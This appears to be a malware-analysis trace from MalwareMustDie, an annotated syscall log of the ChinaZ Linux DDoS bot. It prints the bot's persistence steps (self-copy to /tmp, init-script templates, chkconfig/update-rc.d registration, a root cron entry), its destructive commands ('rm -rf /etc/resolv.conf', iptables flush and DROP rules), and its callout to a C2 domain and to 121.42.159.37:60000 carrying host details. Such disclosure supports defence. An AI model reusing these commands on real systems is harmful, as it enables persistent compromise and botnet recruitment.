ChinaZ Reloaded

1. # MalwareMustDie! ChinaZ Initial execution calls &
2. # Networking commands
3.  
4. /////////////////////////
5. //
6. //   COMMAND EXECUTION
7. //
8. /////////////////////////
9.  
10. // run..
11.  
12. execve("./SAMPLE"["./SAMPLE"] )
13.  
14. // self copy...to /tmp with the dull name with "chinaz" in it..
15.  
16. uname()
17. chdir("/tmp")
18. readlink("/proc/self/exe", "/home/YOU/test/SAMPLE", 256)
19. open("/home/YOU/test/SAMPLE", O_RDONLY)
20. open("/tmp/.chinaz{1434745889", O_WRONLY|O_CREAT, 0777)
21. read(0, "\177ELF\1\1\1\3\0\0\0\0\0\0\0\0\2\0\3\0\1\0\0\0\360\201\4\0104\0\0\0"..., 4096)
22. write(1, "\177ELF\1\1\1\3\0\0\0\0\0\0\0\0\2\0\3\0\1\0\0\0\360\201\4\0104\0\0\0"..., 4096)
23.  
24. //installer..
25.  
26. #!/bin/sh\n# chkconfig: 12345 90 90\n# description: %s\n### BEGIN INIT INFO\n# Provides:\t\t%s\n# Required-Start:\t\n# Required-Stop:\t\n# Default-Start:\t1 2 3 4 5\n# Default-Stop:\t\t\n# Short-Description:\t%s\n### END INIT INFO\ncase $1 in\nstart)\n\t%s\n\t;;\nstop)\n\t;;\n*)\n\t%s\n\t;;\nesac\n
27. #!/bin/sh\nPATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin\nfor i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done\ncp /lib/udev/udev /lib/udev/debug\n/lib/udev/debug\n                                                                        
28.  
29. // setting runtime for self copied malware file...
30.  
31. execve("/usr/local/bin/chkconfig"["chkconfig""--add"".chinaz{1434744983"] )
32. execve("/usr/bin/chkconfig"["chkconfig""--add"".chinaz{1434744983"] )
33. execve("/bin/chkconfig"["chkconfig""--add"".chinaz{1434744983"] )
34. execve("/usr/local/games/chkconfig"["chkconfig""--add"".chinaz{1434744983"] )
35. execve("/usr/games/chkconfig"["chkconfig""--add"".chinaz{1434744983"] )
36. execve("/usr/local/bin/update-rc.d"["update-rc.d"".chinaz{1434744983""defaults"] )
37. execve("/usr/bin/update-rc.d"["update-rc.d"".chinaz{1434744983""defaults"] )
38. execve("/bin/update-rc.d"["update-rc.d"".chinaz{1434744983""defaults"] )
39. execve("/usr/local/games/update-rc.d"["update-rc.d"".chinaz{1434744983""defaults"] )
40. execve("/usr/games/update-rc.d"["update-rc.d"".chinaz{1434744983""defaults"] )
41. execve("/usr/local/bin/update-rc.d"["update-rc.d""SAMPLE""remove"] )
42. execve("/usr/bin/update-rc.d"["update-rc.d""SAMPLE""remove"] )
43. execve("/bin/update-rc.d"["update-rc.d""SAMPLE""remove"] )
44.  
45. // deleting the original sample...
46.  
47. execve("/usr/local/games/update-rc.d"["update-rc.d""SAMPLE""remove"] )
48. execve("/usr/games/update-rc.d"["update-rc.d""SAMPLE""remove"] )
49. execve("/usr/local/bin/chkconfig"["chkconfig""--del""SAMPLE"] )
50. execve("/usr/bin/chkconfig"["chkconfig""--del""SAMPLE"] )
51. execve("/bin/chkconfig"["chkconfig""--del""SAMPLE"] )
52. execve("/usr/local/games/chkconfig"["chkconfig""--del""SAMPLE"] )
53. execve("/usr/games/chkconfig"["chkconfig""--del""SAMPLE"] )
54.  
55. // setting cron...
56.  
57. execve("/bin/sh"["sh""-c""sed -i '/\\/etc\\/cron.hourly\\/cron.sh/d' /etc/crontab && echo '*/3 * * * * root /etc/cron.hourly/cron.sh' >> /etc/crontab"...] )
58. execve("/bin/sed"["sed -i '/\\/etc\\/cron.hourly\\/cron.sh/d' /etc/crontab && echo '*/3 * * * * root /etc/cron.hourly/cron.sh' >> /etc/crontab"] )
59.  
60. // deleting your resolve.conf...YES..LITERALLY!
61.  
62. execve("/bin/sh"["sh""-c""rm -rf /etc/resolv.conf"] )
63. execve("/bin/rm"["rm""-rf""/etc/resolv.conf"] )
64.  
65. // installing the config..
66.  
67. execve("/bin/sh"["sh""-c""touch /home/YOU/ConfigDatecz"] )
68. execve("/usr/bin/touch"["touch""/home/YOU/ConfigDatecz"] )
69.  
70. // resetting iptables & setting the malicious purpose one
71.  
72. execve("/bin/sh"["sh""-c""whoami"] )
73. execve("/bin/sh"["sh""-c""iptables --flush"]
74. execve("/usr/bin/whoami"["whoami"] )
75. execve("/bin/sh"["sh""-c""iptables -A OUTPUT -p tcp --dport %d -j DROP"...]
76. execve("/bin/sh"["sh""-c""whoami"] )
77. execve("/usr/bin/whoami"["whoami"] )
78. execve("/bin/sh"["sh""-c""iptables -A OUTPUT -p tcp --dport %d -j DROP"...] )
79. execve("/bin/sh"["sh""-c""iptables -A OUTPUT -p tcp --dport %d -j DROP"...] )
80. execve("/bin/sh"["sh""-c""iptables -A OUTPUT -p tcp --dport %d -j DROP"...] )
81. execve("/bin/sh"["sh""-c""iptables -A OUTPUT -p tcp --dport %d -j DROP"...] )
82. execve("/bin/sh"["sh""-c""iptables -A OUTPUT -p tcp --dport %d -j DROP"...] )
83.         (...)
84.  
85. /////////////////////////
86. //
87. //     NETWORKING
88. //
89. /////////////////////////
90.  
91. // the checking of the loopback, local and global ethernet interface, for the iptables operations..
92.  
93. socket(PF_INET, SOCK_DGRAM, IPPROTO_IP)
94. {{"lo", {AF_INET, inet_addr("127.0.0.1")}},
95. {"eth0", {AF_INET, inet_addr("a,b,c,d")}},
96. {"ethn", {AF_INET, inet_addr("w,x,y,z")}}}})
97.  
98. // Kick DNS to request CNC domain...
99.  
100. socket(PF_INET, SOCK_STREAM, IPPROTO_IP)
101. open("/etc/resolv.conf", O_RDONLY)
102. read(4, "nameserver DNS-ADDRESS\nnameser"..., 4096)
103. socket(PF_INET, SOCK_DGRAM|SOCK_NONBLOCK, IPPROTO_IP)
104. connect(4, {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("DNS-ADDRESS")}
105. send(4, "\5\237\1\0\0\1\0\0\0\0\0\0\3www\5avttx\2cn\0\0\1\0\1", 30, MSG_NOSIGNAL)
106. recvfrom(4, "\5\237\201\200\0\1\0\1\0\2\0\6\3www\5avttx\2cn\0\0\1\0\1\300\f"
107.             {sa_family=AF_INET, sin_port=htons(53), sin_addr=inet_addr("DNS-ADDRESS")}
108.  
109. // sending your hostname & etc uname infos to the CNC..
110.  
111. connect(3, {sa_family=AF_INET, sin_port=htons(60000), sin_addr=inet_addr("121.42.159.37")}
112. send(-1, "ThisIsNotLinux\0\0\0\0\0\0\0\0\0\0\0\0"..., 372, 0)
113.  
114. // PS: Upon succcess the connection the Config.ini file wil be saved.
115.        And the system will be rebooted and ready to be functioned as a ddoser bot.
116.  
117. # end